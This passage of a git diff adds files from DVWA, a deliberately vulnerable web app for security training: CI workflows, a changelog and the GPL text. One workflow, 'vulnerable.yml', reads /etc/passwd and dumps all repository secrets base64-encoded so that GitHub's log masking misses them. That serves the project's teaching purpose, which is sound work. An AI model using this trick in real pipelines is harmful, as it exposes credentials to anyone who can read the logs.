branches: [master] + pull_request: + # The branches below must be a subset of the branches above + branches: [master] + schedule: + - cron: '0 15 * * 3' + +jobs: + analyze: + name: Analyze + runs-on: ubuntu-latest + + strategy: + fail-fast: false + matrix: + # Override automatic language detection by changing the below list + # Supported options are ['csharp', 'cpp', 'go', 'java', 'javascript', 'python'] + language: ['javascript', 'python'] + # Learn more... + # https://docs.github.com/en/github/finding-security-vulnerabilities-and-errors-in-your-code/configuring-code-scanning#overriding-automatic-language-detection + + steps: + - name: Checkout repository + uses: actions/checkout@v3 + with: + # We must fetch at least the immediate parents so that if this is + # a pull request then we can checkout the head. + fetch-depth: 2 + + # If this run was triggered by a pull request event, then checkout + # the head of the pull request instead of the merge commit. + - run: git checkout HEAD^2 + if: ${{ github.event_name == 'pull_request' }} + + # Initializes the CodeQL tools for scanning. + - name: Initialize CodeQL + uses: github/codeql-action/init@v2 + with: + languages: ${{ matrix.language }} + # If you wish to specify custom queries, you can do so here or in a config file. + # By default, queries listed here will override any specified in a config file. + # Prefix the list here with "+" to use these queries and those in the config file. + # queries: ./path/to/local/query, your-org/your-repo/queries@main + + # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). + # If this step fails, then you should remove it and run the build manually (see below) + - name: Autobuild + uses: github/codeql-action/autobuild@v2 + + # ℹī¸ Command-line programs to run using the OS shell. + # 📚 https://git.io/JvXDl + + # ✏ī¸ If the Autobuild fails above, remove it and uncomment the following three lines + # and modify them (or add more) to build your code if your project + # uses a compiled language + + #- run: | + # make bootstrap + # make release + + - name: Perform CodeQL Analysis + uses: github/codeql-action/analyze@v2 diff --git a/DVWA/.github/workflows/docker-image.yml b/DVWA/.github/workflows/docker-image.yml new file mode 100644 index 00000000..31771fe5 --- /dev/null +++ b/DVWA/.github/workflows/docker-image.yml @@ -0,0 +1,36 @@ +name: Docker Image CI + +on: + workflow_dispatch: + push: + branches: [master] + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + + - name: Login to GitHub Container Registry + uses: docker/login-action@v1 + with: + registry: ghcr.io + username: ${{ github.actor }} + password: ${{ secrets.GITHUB_TOKEN }} + + - name : Build and push DVWA image + run: | + IMAGE_ID=ghcr.io/${{ github.repository_owner }}/dvwa + IMAGE_ID=$(echo $IMAGE_ID | tr '[A-Z]' '[a-z]') + VERSION=$(echo "${{ github.ref }}" | sed -e 's,.*/\(.*\),\1,') + [[ "${{ github.ref }}" == "refs/tags/"* ]] && VERSION=$(echo $VERSION | sed -e 's/^v//') + [ "$VERSION" == "master" ] && VERSION=latest + COMMIT=$(echo "${{ github.sha }}" | cut -c 1-7) + echo IMAGE_ID=$IMAGE_ID + echo VERSION=$VERSION + echo COMMIT=$COMMIT + docker image build --tag dvwa . + docker image tag dvwa $IMAGE_ID:$VERSION + docker image tag dvwa $IMAGE_ID:$COMMIT + docker image push $IMAGE_ID:$VERSION + docker image push $IMAGE_ID:$COMMIT diff --git a/DVWA/.github/workflows/pytest.yml b/DVWA/.github/workflows/pytest.yml new file mode 100644 index 00000000..c508618e --- /dev/null +++ b/DVWA/.github/workflows/pytest.yml @@ -0,0 +1,25 @@ +name: CI + +on: + push: + branches: [master] + pull_request: + branches: [master] + schedule: + # Every Sunday at 0AM UTC + - cron: "0 0 * * 0" + +jobs: + Pytest: + runs-on: ubuntu-latest + + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + + - name: Install and Run Pytest + run: | + export SETUPTOOLS_USE_DISTUTILS=stdlib + pip3 install pytest + python3 -m pytest -s diff --git a/DVWA/.github/workflows/shiftleft-analysis.yml b/DVWA/.github/workflows/shiftleft-analysis.yml new file mode 100644 index 00000000..1013170b --- /dev/null +++ b/DVWA/.github/workflows/shiftleft-analysis.yml @@ -0,0 +1,42 @@ +# This workflow integrates Scan with GitHub's code scanning feature +# Scan is a free open-source security tool for modern DevOps teams from ShiftLeft +# Visit https://slscan.io/en/latest/integrations/code-scan for help +name: SL Scan + +# This section configures the trigger for the workflow. Feel free to customize depending on your convention +on: + push: + branches: [master] + pull_request: + branches: [master] + +jobs: + Scan-Build: + # Scan runs on ubuntu, mac and windows + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + # Instructions + # 1. Setup JDK, Node.js, Python etc depending on your project type + # 2. Compile or build the project before invoking scan + # Example: mvn compile, or npm install or pip install goes here + # 3. Invoke Scan with the github token. Leave the workspace empty to use relative url + + - name: Perform Scan + uses: ShiftLeftSecurity/scan-action@master + env: + WORKSPACE: "" + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SCAN_AUTO_BUILD: true + with: + output: reports + # Scan auto-detects the languages in your project. To override uncomment the below variable and set the type + # type: credscan,java + # type: python + + - name: Upload report + uses: github/codeql-action/upload-sarif@v2 + with: + sarif_file: reports diff --git a/DVWA/.github/workflows/vulnerable.yml b/DVWA/.github/workflows/vulnerable.yml new file mode 100644 index 00000000..405310d5 --- /dev/null +++ b/DVWA/.github/workflows/vulnerable.yml @@ -0,0 +1,54 @@ +name: Vulnerable Action + +on: + push: + branches: + - master + +jobs: + run_commands: + name: Run Linux Commands + runs-on: ubuntu-latest + steps: + - name: Directory Listing + run: | + ls -al + ls / + pwd + id + cat /etc/passwd + + get_secrets: + name: Get Some Secrets + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get Secret + env: + ALLMYSECRETS: ${{ toJSON(secrets) }} + ALLMYVARS: ${{ toJSON(vars) }} + SUPER_SECRET: ${{ secrets.DVWA_SECRET_KEY }} + run: | + # This will just show *** + echo "$SUPER_SECRET" + + # This will put the secret into a file and then display the file, but that + # will still only show *** + echo "$SUPER_SECRET" > secret_file + cat secret_file + + # This will try to show all the secrets, but will show *** instead + echo "$ALLMYSECRETS" + + # This will show the variables, because variables are public + echo "$ALLMYVARS" + + # This will show a base64 encoded version of the one secret. + # Github doesn't recognise this so will allow it to be shown + echo "$SUPER_SECRET" | base64 + + # Same for all the tokens. + echo "$ALLMYSECRETS" | base64 diff --git a/DVWA/.gitignore b/DVWA/.gitignore new file mode 100644 index 00000000..eb451b8a --- /dev/null +++ b/DVWA/.gitignore @@ -0,0 +1,16 @@ +# Neither the config file or its backup should go +# into the repo. +config/config.inc.php.bak +config/config.inc.php + +# Vim swap files +.*swp + +# VS Code editor files +*.code-workspace + +# Used by pytest +tests/__pycache__/ + +# Don't include any uploaded images +hackable/uploads/* diff --git a/DVWA/CHANGELOG.md b/DVWA/CHANGELOG.md new file mode 100644 index 00000000..723a8613 --- /dev/null +++ b/DVWA/CHANGELOG.md @@ -0,0 +1,162 @@ +DAMN VULNERABLE WEB APPLICATION +======================= + +v1.10 (*Not Yet Released) +====== + ++ Improved IIS support. (@g0tmi1k) ++ Improved setup system check. (@g0tmi1k) + +v1.9 (2015-10-05) +====== + ++ Added a dedicated objective (or "flag") for file include. (@g0tmi1k) ++ Added a warning to any module that requires a certain configuration. (@g0tmi1k) ++ Added comments to all source code that would be visible via DVWA modules. (@g0tmi1k) ++ Added CSRF token to pre-auth forms (login/setup/security pages). (@g0tmi1k + @Shinkurt) ++ Added HttpOnly cookie flag on impossible levels. (@g0tmi1k) ++ Added more detail to the documentation. (@g0tmi1k) ++ Added PDO to all impossible levels requiring MySQL. (@g0tmi1k) ++ Added PHPIDS options into the config file. (@g0tmi1k) ++ Added system check to setup. (@g0tmi1k) ++ Added various information to all help pages for every module. (@g0tmi1k) ++ Changed brute force medium to be harder due to sleep. (@g0tmi1k) ++ Changed file include landing page + added 3x example pages. (@g0tmi1k) ++ Changed file include medium to be harder due to more filters. (@g0tmi1k) ++ Changed HTTP REFERER check for medium level CSRF. (@g0tmi1k) ++ Changed input box for medium level with SQLi + SQLi Blind. (@g0tmi1k) ++ Changed SQLi + SQLi Blind to be $_POST rather than $_GET. (@g0tmi1k) ++ Changed SQLi Blind to be a real example of the vulnerability. (@g0tmi1k) ++ Fixed brute force and file upload impossible levels, as they were vulnerable. (@g0tmi1k + @Shinkurt) ++ Fixed bug with file fnclude page not loading. (@g0tmi1k) ++ Fixed CAPTCHA bug to read URL parameters on impossible. (@g0tmi1k) ++ Fixed CAPTCHA bug where the form wouldn't be visible. (@g0tmi1k) ++ Fixed CAPTCHA bug where the URL parameters were not being used for low + medium. (@g0tmi1k) ++ Fixed CSRF medium level bug when not on localhost. (@g0tmi1k) ++ Fixed setup bug with custom URL path. (@g0tmi1k) ++ Removed PostgreSQL DB support. (@g0tmi1k) ++ Renamed 'Command Execution' to 'Command Injection'. (@g0tmi1k) ++ Renamed 'high' level to 'impossible' and created new vectors for 'high'. (@g0tmi1k) ++ Updated README and documentation. (@g0tmi1k) ++ Various code cleanups in the core PHP files + CSS. (@g0tmi1k) ++ Various setup improvements (e.g. redirection + limited menu links). (@g0tmi1k) + +v1.8 (2013-05-01) +====== + ++ Versioning change: Version numbers now follow Major.Minor (e.g. v1.8) removing the middle digit. ++ Moved default security level setting to the config file. ++ Fixed a bug which prevented setup when a database name other than 'dvwa' was used. ++ Added a logic challenge involving an insecure CAPTCHA (requires external internet access) + +v1.0.7 (2010-09-08) +====== + ++ Re-designed the login page + made some other slight cosmetic changes. 06/06/2010 (@ethicalhack3r) ++ Started PostgreSQL implementation. 15/03/2010 (@ethicalhack3r) ++ A few small cosmetic changes. 15/03/2010 (@ethicalhack3r) ++ Improved the help information and look. 15/03/2010 (@ethicalhack3r) ++ Fixed a few bugs thanks to @Digininja. 15/03/2010 (@ethicalhack3r) ++ Show logged in username. 05/02/2010 (Jason Jones) ++ Added new info on RandomStorm. 04/02/2010 (@ethicalhack3r) ++ Added 'SQL Injection (Blind)'. 04/02/2010 (@ethicalhack3r) ++ Added official documentation. 21/11/2009 (@ethicalhack3r) ++ Implemented view all source functionality. 16/10/2009 (tmacuk, craig, @ethicalhack3r) + +v1.0.6 (2009-10-05) +====== + ++ Fixed a bug where the logo would not show on first time use. 03/09/2009 (@ethicalhack3r) ++ Removed 'current password' input box for low+med CSRF security. 03/09/2009 (@ethicalhack3r) ++ Added an article which was written for OWASP Turkey. 03/10/2009 (@ethicalhack3r) ++ Added more toubleshooting information. 02/10/2009 (@ethicalhack3r) ++ Stored XSS high now sanitises output. 02/10/2009 (@ethicalhack3r) ++ Fixed a 'bug' in XSS stored low which made it not vulnerable. 02/10/2009 (@ethicalhack3r) ++ Rewritten command execution high to use a whitelist. 30/09/09 (@ethicalhack3r) ++ Fixed a command execution vulnerability in exec high. 17/09/09 (@ethicalhack3r) ++ Added some troubleshooting info for PHP 5.2.6 in readme.txt. 17/09/09 (@ethicalhack3r) ++ Added the upload directory to the upload help. 17/09/09 (@ethicalhack3r) + +v1.0.5 (2009-09-03) +====== + ++ Made IE friendly as much as possible. 30/08/2009 (@ethicalhack3r) ++ Removed the acunetix scan report. 30/08/2009 (@ethicalhack3r) ++ Added 'Clear Log' button to PHPIDS parser. 27/08/2009 (@ethicalhack3r) ++ Implemented PHPIDS log parser. 27/08/2009 (@ethicalhack3r) ++ Implemented Stored XSS vulnerability. 27/08/2009 (@ethicalhack3r) ++ Added htaccess rule for localhost access only. 22/08/2009 (@ethicalhack3r) ++ Added CSRF. 01/08/2009 (@ethicalhack3r) ++ Implemented sessions/login. 01/08/2009 (@ethicalhack3r) ++ Complete recode. (jamesr) ++ Complete redesign. (jamesr) ++ Delimited 'dvwa' in session- minimising the risk of clash with other projects running on localhost. 01/08/2009 (jamesr) ++ Integrated PHPIDS v0.6. 01/08/2009 (jamesr) ++ Streamlined login functionality. 01/08/2009 (jamesr) + +v1.0.4 (2009-06-29) +====== + ++ Added acunetix scan report. 24/06/2009 ++ All links use http://hiderefer.com to hide referrer header. 23/06/2009 ++ Updated/added 'more info' links. 23/06/2009 ++ Moved change log info to CHANGELOG.txt. 22/06/2009 ++ Fixed the exec.php UTF-8 output. 16/06/2009 ++ Moved Help/View source buttons to footer. 12/06/2009 ++ Fixed phpInfo bug. 12/06/2009 ++ Made dvwa IE friendly. 11/06/2009 ++ Fixed html bugs. 11/06/2009 ++ Added more info to about page. 03/06/2009 ++ Added pictures for the users. 03/06/2009 ++ Fixed typos on the welcome page. 03/06/2009 ++ Improved README.txt and fixed typos. 03/06/2009 ++ Made SQL injection possible in sqli_med.php. Thanks to Teodor Lupan. 03/06/2009 + +v1.0.3 (2009-05-25) +====== + ++ Changed XAMPP link in index.php. 25/05/2009 ++ Set default security to low. 25/05/2009 ++ Improved output in setup.php. 25/05/2009 + +v1.0.2 (2009-05-24) +====== + ++ Removed phpinfo on higher security levels. 24/05/2009 ++ Moved all vulnerable code to /source/. 24/05/2009 ++ Added viewsource. 24/05/2009 + +v1.0.1 (2009-05-24) +====== + ++ Implemented different security levels. 24/05/2009 ++ Changed XSS from POST to GET. 22/05/2009 ++ Some changes to CSS. 22/05/2009 ++ Version number now in variable in header.php. 21/05/2009 ++ Added about page. 21/05/2009 ++ Updated login script to use database. 21/05/2009 ++ Added admin user to database. 21/05/2009 ++ Combined RFI + LFI to make 'File Inclusion'. 21/05/2009 ++ More realism to Local File Inclusion. 21/05/2009 ++ Better error output on upload script. 21/05/2009 + +v1.0 (2009-05-20) +==== + ++ Made command execution more realistic. 20/05/2009 ++ Added help buttons. 20/05/2009 ++ Added .htaccess file to turn magic quotes off. 20/05/2009 ++ Improved database creation with setup.php. 19/05/2009 ++ Amended installation instructions in README file. 19/05/2009 ++ Added GNU GPL license. 19/05/2009 ++ Added a robots.txt file with disallow all. 26/01/2009 ++ Removed link to www.ethicalhacker.co.uk in footer. 26/01/2009 ++ Added better error output on magic quotes. 26/01/2009 + + +Links +===== + ++ Homepage: http://www.dvwa.co.uk + +_Created by the DVWA team._ diff --git a/DVWA/COPYING.txt b/DVWA/COPYING.txt new file mode 100644 index 00000000..53499081 --- /dev/null +++ b/DVWA/COPYING.txt @@ -0,0 +1,623 @@ + GNU GENERAL PUBLIC LICENSE + Version 3, 29 June 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU General Public License is a free, copyleft license for +software and other kinds of works. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +the GNU General Public License is intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. We, the Free Software Foundation, use the +GNU General Public License for most of our software; it applies also to +any other work released this way by its authors. You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + To protect your rights, we need to prevent others from denying you +these rights or asking you to surrender the rights. Therefore, you have +certain responsibilities if you distribute copies of the software, or if +you modify it: responsibilities to respect the freedom of others. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must pass on to the recipients the same +freedoms that you received. You must make sure that they, too, receive +or can get the source code. And you must show them these terms so they +know their rights. + + Developers that use the GNU GPL protect your rights with two steps: +(1) assert copyright on the software, and (2) offer you this License +giving you legal permission to copy, distribute and/or modify it. + + For the developers' and authors' protection, the GPL clearly explains +that there is no warranty for this free software. For both users' and +authors' sake, the GPL requires that modified versions be marked as +changed, so that their problems will not be attributed erroneously to +authors of previous versions. + + Some devices are designed to deny users access to install or run +modified versions of the software inside them, although the manufacturer +can do so. This is fundamentally incompatible with the aim of +protecting users' freedom to change the software. The systematic +pattern of such abuse occurs in the area of products for individuals to +use, which is precisely where it is most unacceptable. Therefore, we +have designed this version of the GPL to prohibit the practice for those +products. If such problems arise substantially in other domains, we +stand ready to extend this provision to those domains in future versions +of the GPL, as needed to protect the freedom of users. + + Finally, every program is threatened constantly by software patents. +States should not allow patents to restrict development and use of +software on general-purpose computers, but in those that do, we wish to +avoid the special danger that patents applied to a free program could +make it effectively proprietary. To prevent this, the GPL assures that +patents cannot be used to render the program non-free. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of 